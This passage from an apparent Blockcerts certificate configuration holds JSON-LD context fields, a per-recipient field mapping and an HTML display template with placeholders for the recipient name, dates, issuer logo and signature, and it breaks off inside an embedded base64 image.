gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIA==",
"additional_global_fields": [
{"path": "$.displayHtml", "value": ""},
{
"path": "$.@context",
"value": [
"https://w3id.org/openbadges/v2",
"https://w3id.org/blockcerts/v2",
{"displayHtml": {"@id": "schema:description"}}
]
}
],
"additional_per_recipient_fields": [{"path": "$.displayHtml", "value": "*|FOO|*", "csv_column": "displayHtml"}],
"display_html": '<div class="sc-EHOje kcwAhk" style="font-family: Lato; text-align: left;"> <img src="%ISSUER_LOGO%" class="sc-jTzLTM gdVHeQ" style="max-width: 110px;" /><h2 class="sc-bZQynM hJaChX" style="font-size: 18.4px; font-weight: normal; font-style: italic; line-height: 1.76; -webkit-letter-spacing: -0.1px; -moz-letter-spacing: -0.1px; -ms-letter-spacing: -0.1px; letter-spacing: -0.1px; color: #2c2b3f; margin: 25px 0 0 0;" > %CERT_TITLE%</h2><p class="sc-gzVnrw gsQrMB" style="font-size: 14.4px; line-height: 1.88; -webkit-letter-spacing: 0; -moz-letter-spacing: 0; -ms-letter-spacing: 0; letter-spacing: 0; color: #9595a0; margin: 0;" > Issued to</p><h3 class="sc-htoDjs kQAJr" style="font-weight: normal; line-height: 1.38; -webkit-letter-spacing: -0.1px; -moz-letter-spacing: -0.1px; -ms-letter-spacing: -0.1px; letter-spacing: -0.1px; color: #d52c1e; margin: 0 0 10px 0; font-size: 46.4px; font-family: LucidaGrande; line-height: 0.7; -webkit-letter-spacing: -00.2px; -moz-letter-spacing: -00.2px; -ms-letter-spacing: -00.2px; letter-spacing: -00.2px; margin: 35px 0 40px 0; text-transform: uppercase;" > %RECIPIENT_NAME%</h3><div class="sc-dnqmqq bDsesi"><div class="sc-gpHHfC hrlnEG" style="display: inline-block; margin-right: 35px; margin-bottom: 15px;" ><div class="sc-gVyKpa gMtABg" style="font-size: 14.4px; line-height: 1.88; -webkit-letter-spacing: 0; -moz-letter-spacing: 0; -ms-letter-spacing: 0; letter-spacing: 0; color: #9595a0;" > Issue date</div><div class="sc-gVyKpa sc-eXNvrr btZsLP" style="font-size: 14.4px; line-height: 1.88; -webkit-letter-spacing: 0; -moz-letter-spacing: 0; -ms-letter-spacing: 0; letter-spacing: 0; color: #9595a0; color: #2c2b3f;" > %ISSUING_DATE%</div></div><div class="sc-gpHHfC hrlnEG" style="display: inline-block; margin-right: 35px; margin-bottom: 15px;" ><div class="sc-gVyKpa gMtABg" style="font-size: 14.4px; line-height: 1.88; -webkit-letter-spacing: 0; -moz-letter-spacing: 0; -ms-letter-spacing: 0; letter-spacing: 0; color: #9595a0;" > Expiration date</div><div class="sc-gVyKpa sc-eXNvrr btZsLP" style="font-size: 14.4px; line-height: 1.88; -webkit-letter-spacing: 0; -moz-letter-spacing: 0; -ms-letter-spacing: 0; letter-spacing: 0; color: #9595a0; color: #2c2b3f;" > %EXPIRATION_DATE%</div></div> <img src="%ISSUER_SIGNATURE%" class="sc-fjdhpX hrCbRC" style="display: inline-block; max-width: 113px; max-height: 50px" /></div><p class="sc-VigVT kAqoHM" style="font-size: 14px; line-height: 1.36; color: #bababa; margin: 15px 0 27px 0;" > %CERT_DESCRIPTION%</p> <img src="data:image/png;base64,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